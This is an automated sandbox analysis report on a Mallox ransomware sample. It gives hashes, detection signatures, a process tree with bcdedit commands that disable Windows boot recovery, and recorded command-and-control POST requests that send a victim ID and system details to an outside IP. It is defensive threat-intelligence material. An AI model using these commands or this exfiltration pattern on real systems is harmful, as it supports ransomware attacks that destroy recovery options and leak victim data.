Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ransomware Mallox.exe

Overview

General Information

Sample name:Ransomware Mallox.exe
Analysis ID:1549252
MD5:9099859494363864de61fb30d6c201e6
SHA1:90378c5fd151128287c12eea0ea3761833b0ad03
SHA256:06699c98ed2ef759b2434ac5777a2886b966c0ffa1c96c046f5cde77fe833784
Tags:exeMalloxRansomwareuser-JAMESWT_MHT
Infos:

Detection

Targeted Ransomware
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found ransom note / readme
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RansomwareGeneric
Yara detected Targeted Ransomware
AI detected suspicious sample
Creates files in the recycle bin to hide itself
Deletes shadow drive data (may be related to ransomware)
Machine Learning detection for sample
Opens network shares
Sigma detected: Suspicious Epmap Connection
Uses bcdedit to modify the Windows boot settings
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

  • System is w10x64
  • Ransomware Mallox.exe (PID: 7740 cmdline: "C:\Users\user\Desktop\Ransomware Mallox.exe" MD5: 9099859494363864DE61FB30D6C201E6)
    • cmd.exe (PID: 7832 cmdline: "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • bcdedit.exe (PID: 7916 cmdline: bcdedit /set {current} bootstatuspolicy ignoreallfailures MD5: 74F7B84B0A547592CA63A00A8C4AD583)
    • cmd.exe (PID: 7848 cmdline: "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • bcdedit.exe (PID: 7940 cmdline: bcdedit /set {current} recoveryenabled no MD5: 74F7B84B0A547592CA63A00A8C4AD583)
  • notepad.exe (PID: 1568 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO BACK FILES.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: Ransomware Mallox.exe PID: 7740JoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
    Process Memory Space: Ransomware Mallox.exe PID: 7740JoeSecurity_TargetedRansomwareYara detected Targeted RansomwareJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious Epmap Connection
      Source: Network ConnectionAuthor: frack113, Tim Shelton (fps): Data: DestinationIp: 192.168.2.1, DestinationIsIpv6: false, DestinationPort: 135, EventID: 3, Image: C:\Users\user\Desktop\Ransomware Mallox.exe, Initiated: true, ProcessId: 7740, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49801

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-05T13:23:35.895424+010020229301A Network Trojan was detected172.202.163.200443192.168.2.1049826TCP
      2024-11-05T13:24:14.899845+010020229301A Network Trojan was detected172.202.163.200443192.168.2.1049994TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-05T13:23:27.093029+010020398151A Network Trojan was detected192.168.2.104978191.215.85.14280TCP
      2024-11-05T13:23:28.271153+010020398151A Network Trojan was detected192.168.2.104978891.215.85.14280TCP
      2024-11-05T13:23:30.208228+010020398151A Network Trojan was detected192.168.2.104980291.215.85.14280TCP
      2024-11-05T13:23:31.457212+010020398151A Network Trojan was detected192.168.2.104980891.215.85.14280TCP
      2024-11-05T13:23:32.564101+010020398151A Network Trojan was detected192.168.2.104981991.215.85.14280TCP
      2024-11-05T13:23:33.958951+010020398151A Network Trojan was detected192.168.2.104982591.215.85.14280TCP
      2024-11-05T13:23:35.756816+010020398151A Network Trojan was detected192.168.2.104983891.215.85.14280TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: Ransomware Mallox.exeAvira: detected
      Multi AV Scanner detection for submitted file
      Source: Ransomware Mallox.exeReversingLabs: Detection: 81%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
      Machine Learning detection for sample
      Source: Ransomware Mallox.exeJoe Sandbox ML: detected
      Source: Ransomware Mallox.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: Ransomware Mallox.exe, 00000000.00000003.1689061261.0000023CAFFE6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ntkrnlmp.pdb source: Ransomware Mallox.exe, 00000000.00000003.1688757795.0000023CAFFE6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\HOW TO BACK FILES.txtxt source: Ransomware Mallox.exe, 00000000.00000003.1696834790.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1699524403.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1692939049.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1700357889.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: z:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: x:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: v:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: t:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: r:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: p:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: n:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: l:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: j:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: h:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: f:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: d:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: b:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: y:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: w:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: u:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: s:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: q:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: o:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: m:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: k:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: i:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: g:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: e:Jump to behavior
      Source: C:\Windows\System32\bcdedit.exeFile opened: c:
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: a:Jump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeDirectory queried: number of queries: 1001
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: C:\Program Files\Adobe\Acrobat DCJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: C:\Program Files\Adobe\NULLJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: C:\Program Files\Adobe\Acrobat DC\AcrobatJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdfJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\NULLJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile opened: C:\Program Files\Adobe\Acrobat DC\NULLJump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.10:49781 -> 91.215.85.142:80
      Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.10:49788 -> 91.215.85.142:80
      Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.10:49825 -> 91.215.85.142:80
      Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.10:49838 -> 91.215.85.142:80
      Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.10:49802 -> 91.215.85.142:80
      Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.10:49808 -> 91.215.85.142:80
      Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.10:49819 -> 91.215.85.142:80
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.ipify.orgConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.215.85.142Content-Length: 158Connection: Keep-AliveCache-Control: no-cacheData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30 Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
      Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.215.85.142Content-Length: 158Connection: Keep-AliveCache-Control: no-cacheData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30 Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
      Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.215.85.142Content-Length: 158Connection: Keep-AliveCache-Control: no-cacheData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30 Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
      Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.215.85.142Content-Length: 158Connection: Keep-AliveCache-Control: no-cacheData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30 Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
      Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.215.85.142Content-Length: 158Connection: Keep-AliveCache-Control: no-cacheData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30 Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
      Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.215.85.142Content-Length: 158Connection: Keep-AliveCache-Control: no-cacheData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30 Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
      Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.215.85.142Content-Length: 158Connection: Keep-AliveCache-Control: no-cacheData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30 Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
      Source: Joe Sandbox ViewIP Address: 91.215.85.142 91.215.85.142
      Source: Joe Sandbox ViewASN Name: PINDC-ASRU PINDC-ASRU
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.10:49826
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.10:49994
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: unknownTCP traffic detected without corresponding DNS query: 91.215.85.142
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.ipify.orgConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: unknownHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.215.85.142Content-Length: 158Connection: Keep-AliveCache-Control: no-cacheData Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30 Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 12:23:26 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
